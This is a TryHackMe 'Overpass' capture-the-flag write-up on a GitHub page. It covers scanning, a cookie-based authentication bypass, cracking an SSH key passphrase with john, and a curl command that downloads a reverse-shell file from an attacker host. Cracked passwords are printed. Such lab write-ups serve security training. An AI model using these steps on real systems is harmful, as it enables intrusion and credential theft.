Writeup for THM room Overpass

set -gx IP 10.10.33.60

Init nmap scan

sudo nmap -sN -sC -sV -oN nmap/init $IP

Ports: 22, 80

Gobuster

gobuster dir -u $IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

login Page

found interesting codes snippet on /admin > login.js

const response = await postData("/api/login", creds)
const statusOrCookie = await response.text()
if (statusOrCookie === "Incorrect credentials") {
    loginStatus.textContent = "Incorrect Credentials"
    passwordBox.value=""
} else {
    Cookies.set("SessionToken",statusOrCookie)
    window.location = "/admin"
}

set cookie manually Cookies.set("SessionToken","") and reload page

Crack ssh keyphrase

Downloaded RSA Key found on /admin
transformed to john format ssh2john id_rsa > ssh2john.txt
cracked with john john ssh2john.txt

Found keyphrase: james13

Connect via ssh

ssh -i ./id_rsa james@$IP
# keypass: james13

URL=http://10.18.94.63:8000/rev-shell.go
LFILE=shell.go
curl $URL -o $LFILE

Password stored in overpass:

System: saydrawnlyingpicture

Name		Name	Last commit message	Last commit date
Latest commit History 1 Commit
downloads/src		downloads/src
nmap		nmap
CVE-2021-4034-main.zip		CVE-2021-4034-main.zip
buildscript.sh		buildscript.sh
id_rsa		id_rsa
linpeas.sh		linpeas.sh
login.js		login.js
overpass.go		overpass.go
overpass.txt		overpass.txt
readme.md		readme.md
rev-shell.go		rev-shell.go
ssh2john.txt		ssh2john.txt

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

Writeup for THM room Overpass

Init nmap scan

Gobuster

login Page

Crack ssh keyphrase

Connect via ssh

About

Releases

Packages

Languages

Crako123/THM-Overpass

Folders and files

Latest commit

History

Repository files navigation

Writeup for THM room Overpass

Init nmap scan

Gobuster

login Page

Crack ssh keyphrase

Connect via ssh

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages